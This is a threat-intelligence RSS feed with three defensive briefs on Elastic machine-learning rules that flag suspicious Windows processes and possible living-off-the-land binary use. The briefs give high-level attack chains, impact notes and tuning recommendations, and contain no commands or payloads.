https://feed.craftedsignal.io/tags/lolbins/Trending threats, MITRE ATT&CK coverage, and detection metadata — refreshed continuously.Hugoenhello@craftedsignal.iohello@craftedsignal.ioTue, 23 Jan 2024 12:00:00 +0000https://feed.craftedsignal.io/briefs/2024-01-unusual-process-spawn/Tue, 23 Jan 2024 12:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2024-01-unusual-process-spawn/A machine learning job detected a suspicious Windows process, predicted malicious by the ProblemChild model and flagged as an unusual child process name for its parent, potentially indicating LOLbins usage and evading traditional detection.This alert originates from an Elastic machine learning job named problem_child_rare_process_by_parent_ea designed to detect Living off the Land (LotL) attacks on Windows systems. The model identifies processes spawned by parent processes that are statistically rare and have a high probability of being malicious based on the “ProblemChild” supervised learning model. This approach aims to uncover malicious activities that utilize legitimate system binaries (LOLbins) for nefarious purposes, effectively bypassing traditional signature-based detections. The alert relies on Windows process events collected by Elastic Defend or Winlogbeat with the LotL Attack Detection integration. This detection method becomes particularly important as attackers increasingly rely on existing tools to blend in with normal system activity and avoid raising suspicion.

Attack Chain

1. Attacker gains initial access via unspecified means (e.g., phishing, compromised credentials).
2. Attacker leverages a legitimate system binary (LOLbin) such as powershell.exe or cmd.exe.
3. The LOLbin is used to execute a malicious payload or script.
4. The malicious process is spawned as a child process of the LOLbin.
5. Elastic’s machine learning model identifies the child process as rare and potentially malicious based on its parent-child relationship and other features.
6. The rare process executes malicious commands, possibly downloading further payloads.
7. The attacker achieves their objective, such as data exfiltration or lateral movement.

Impact

A successful attack utilizing LOLbins can lead to significant compromise, including data theft, system disruption, and further propagation within the network. The reliance on trusted system binaries makes these attacks difficult to detect with traditional methods, potentially allowing attackers to operate undetected for extended periods. The impact is directly correlated to the privileges of the initial compromised account and the effectiveness of lateral movement techniques employed by the attacker.

Recommendation

• Ensure that the Living off the Land (LotL) Attack Detection integration is installed and configured correctly, along with either Elastic Defend or Winlogbeat, as described in the rule’s setup section.
• Review the parent and child process names identified in the alert to determine if they are legitimate applications or associated with LOLbins, as detailed in the investigation guide within the rule’s note section.
• Investigate the command-line arguments used by the suspicious process for potentially malicious commands or scripts as described in the rule note section.
• Tune the anomaly_threshold setting in the machine learning job configuration based on your environment’s baseline activity to reduce false positives, as described in the rule documentation.
• Implement exceptions for legitimate administrative tools and software updates to reduce false positives, as mentioned in the rule’s note section.

]]>lowadvisorydefense-evasionlolbinswindowsmachine-learninghttps://feed.craftedsignal.io/briefs/2024-01-suspicious-windows-process/Wed, 03 Jan 2024 18:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2024-01-suspicious-windows-process/A machine learning job combination has identified a host with one or more suspicious Windows processes that exhibit unusually high malicious probability scores, potentially indicating masquerading and defense evasion tactics.This detection identifies suspicious Windows processes exhibiting high malicious probability scores. The rule leverages machine learning to detect clusters of processes that may be indicative of defense evasion tactics, such as masquerading or the use of LOLbins (Living Off The Land Binaries). Specifically, a supervised ML model (ProblemChild) predicts whether a process is malicious, and an unsupervised ML model assesses the aggregate score of process clusters on a single host. The rule focuses on identifying unusual process clusters on a single host, indicating potential masquerading tactics for defense evasion. The rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. It was last updated on 2026/04/01 and requires Elastic Stack version 9.4.0 or later.

Attack Chain

1. Initial Access: The attacker gains initial access to the Windows host through various methods, such as exploiting vulnerabilities or using compromised credentials (not detailed in source).
2. Execution: The attacker executes a LOLBin (e.g., PowerShell, cmd.exe, mshta.exe) on the compromised host.
3. Masquerading: The attacker attempts to masquerade the malicious activity by naming or placing the LOLBin within a legitimate system folder.
4. Defense Evasion: The attacker utilizes the LOLBin with specific command-line arguments designed to evade detection by traditional signature-based security solutions.
5. Privilege Escalation (Optional): The attacker may attempt to escalate privileges using further LOLBINS or other techniques.
6. Lateral Movement (Optional): The attacker may use the compromised host to move laterally to other systems within the network.
7. Command and Control (Optional): The attacker may establish command and control (C2) communication with an external server to receive further instructions.
8. Impact: The attacker achieves their objective, such as data exfiltration, ransomware deployment, or system disruption.

Impact

A successful attack can lead to various negative impacts, including data breaches, financial loss, and reputational damage. The rule is assigned a low severity, due to it likely being a supplemental detection to other rules. Lateral movement and exfiltration can also be accomplished. There is no information available on the number of victims and specific sectors targeted.

Recommendation

• Ensure the Living off the Land (LotL) Attack Detection integration is installed and configured correctly, along with either Elastic Defend or Winlogbeat, to collect Windows process events as outlined in the setup instructions.
• Review the host name associated with the suspicious process cluster to determine if it is a critical asset or has a history of similar alerts as suggested in the investigation guide.
• Examine the specific processes flagged by the ProblemChild supervised ML model to identify any known LOLbins or unusual command-line arguments that may indicate masquerading, per the investigation guide.
• Implement application whitelisting to prevent unauthorized or suspicious processes from executing in the future, as advised in the remediation steps.
• Tune the anomaly threshold of the machine learning job (problem_child_high_sum_by_host_ea) to reduce false positives based on your environment’s specific characteristics and activity patterns.

]]>lowadvisorydefense-evasionmasqueradingLOLbinswindowshttps://feed.craftedsignal.io/briefs/2024-01-rare-process-user/Wed, 03 Jan 2024 10:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2024-01-rare-process-user/A machine learning job detected a suspicious Windows process, predicted to be malicious by the ProblemChild supervised ML model and found to be unusual within the user's context, potentially indicating defense evasion techniques like masquerading or the use of LOLbins.A machine learning (ML) rule has identified unusual process execution on a Windows endpoint. This detection leverages two ML models from the Elastic ProblemChild integration: a supervised model that predicts malicious processes and an unsupervised model that identifies processes anomalous to the user’s typical behavior. The rule focuses on detecting defense evasion tactics, specifically the potential use of Living-off-the-Land Binaries (LOLbins) or masquerading techniques, which can be difficult to detect with traditional signature-based methods. This detection uses data from the Elastic Endpoint or Winlogbeat and requires the Living off the Land (LotL) Attack Detection integration assets to be installed. This rule was last updated April 1, 2026 and requires Elastic Stack version 9.4.0 or higher.

Attack Chain

1. Initial Access: The attacker gains initial access through an existing user account.
2. Execution: The attacker executes a standard Windows process (e.g., cmd.exe, powershell.exe).
3. Defense Evasion: The attacker leverages LOLbins to perform malicious actions, blending in with legitimate system activity.
4. Masquerading: The attacker renames or moves malicious tools to mimic legitimate system files.
5. Privilege Escalation (Optional): The attacker attempts to escalate privileges using the compromised process.
6. Lateral Movement (Optional): The attacker uses the compromised process to move laterally to other systems.
7. Command and Control (Optional): The process establishes a connection to a command and control server for further instructions.
8. Impact: The attacker achieves their objective, such as data exfiltration, system compromise, or persistence.

Impact

A successful attack using these techniques can lead to a full system compromise, data theft, or the installation of persistent backdoors. The use of LOLbins makes detection difficult, potentially allowing attackers to operate undetected for extended periods. The impact is amplified by the potential for lateral movement to other systems within the network. While the severity is rated “low”, successful exploitation allows attackers to move laterally and establish persistence in the network.

Recommendation

• Ensure the Living off the Land (LotL) Attack Detection integration is installed and properly configured, as detailed in the rule setup (Elastic Defend or Winlogbeat).
• Investigate alerts generated by the “Unusual Process Spawned by a User” rule (rule_id: 40155ee4-1e6a-4e4d-a63b-e8ba16980cfb) to determine the legitimacy of the flagged process.
• Tune the anomaly threshold (anomaly_threshold: 75) based on your environment to reduce false positives, as mentioned in the rule parameters.
• Review the “False positive analysis” section in the rule’s note for guidance on identifying and excluding legitimate processes.
• Implement the provided Sigma rule to detect unusual command line arguments associated with LOLBins.

]]>lowadvisoryendpointwindowsdefense evasionmachine learninglolbins